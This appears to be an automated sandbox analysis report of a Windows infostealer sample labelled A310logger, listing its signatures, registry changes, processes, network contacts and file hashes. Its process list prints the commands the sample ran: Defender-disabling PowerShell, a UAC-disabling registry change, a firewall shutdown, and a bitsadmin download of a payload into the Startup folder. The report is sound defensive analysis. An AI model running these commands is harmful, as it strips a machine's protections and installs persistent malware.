Analysis Overview
SHA256
525c7562d9f07b07e1bf4a92543ab81576abc61c2ea074f82426b5f0f54df2ec
Threat Level: Known bad
The file 525c7562.exe was found to be: Known bad.
Malicious Activity Summary
A310logger
UAC bypass
A310logger Executable
UPX packed file
Executes dropped EXE
Downloads MZ/PE file
Modifies Windows Firewall
Checks computer location settings
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Download via BitsAdmin
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Modifies registry class
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-28 18:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-28 18:12
Reported
2022-03-28 18:16
Platform
win7-20220311-en
Max time kernel
4294178s
Max time network
120s
Command Line
Signatures
UAC bypass
Modifies Windows Firewall
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\525c7562.exe
"C:\Users\Admin\AppData\Local\Temp\525c7562.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.vbs"
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.docx"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RarSFX0\first.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Packages /download /priority foreground https://github.com/tyler617/first/releases/download/v1.0/first.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.vbs
| MD5 | bbb665124c29492698fa1d4b0c9f7d63 |
| SHA1 | 91f4d90d308fd5e25c56b797f1ee10528f2b7fc9 |
| SHA256 | 4f7b3391cb4b4ca0e55080c4e92538b680a63b39fee77fe9543b37e6a3f6edb3 |
| SHA512 | 51c10ee54cb1c64c3cf5d6e3b30e2d7e926a6de4c634af96fcfa8c5c910988db48f61f1d3c5597251bdbab56702dd1dcd26357a551c2501272072b3beb8f0ae7 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\first.bat
| MD5 | 08c4e453896495e3133c35ffc0fc8f77 |
| SHA1 | 5a544aed791b58787b94573224b12e34db1bd26a |
| SHA256 | 7b1d1e640826175729db746d7c6bcbc0f25d524a3b859107a3e3d2b08d28e458 |
| SHA512 | 2b79fdea82bb87bcd6c1e2b88480c8ebdcb76e59ea70ecff02d14ec0079eedeb7e918102d63e343de64fb13032a85e821e9b24d969c46a05f0f27975bc469e41 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.docx
| MD5 | e4552a689008c6fcd6cd00f3d5a5a93e |
| SHA1 | f9772e236c17c5aca5a0f7889499833d92c9f899 |
| SHA256 | a1078fb7a3acf9bbdba7a623c46c99a3b2df4687800949feafff3868d6f92bec |
| SHA512 | aaa0410cf06914de1f185d328cab0e65b2688fda84f25e1d383b81c7ac53908056edfd4ad1425897c01049e7976611ceb7140df7f5fcc25c8ecdaf8869920c67 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
\??\PIPE\srvsvc
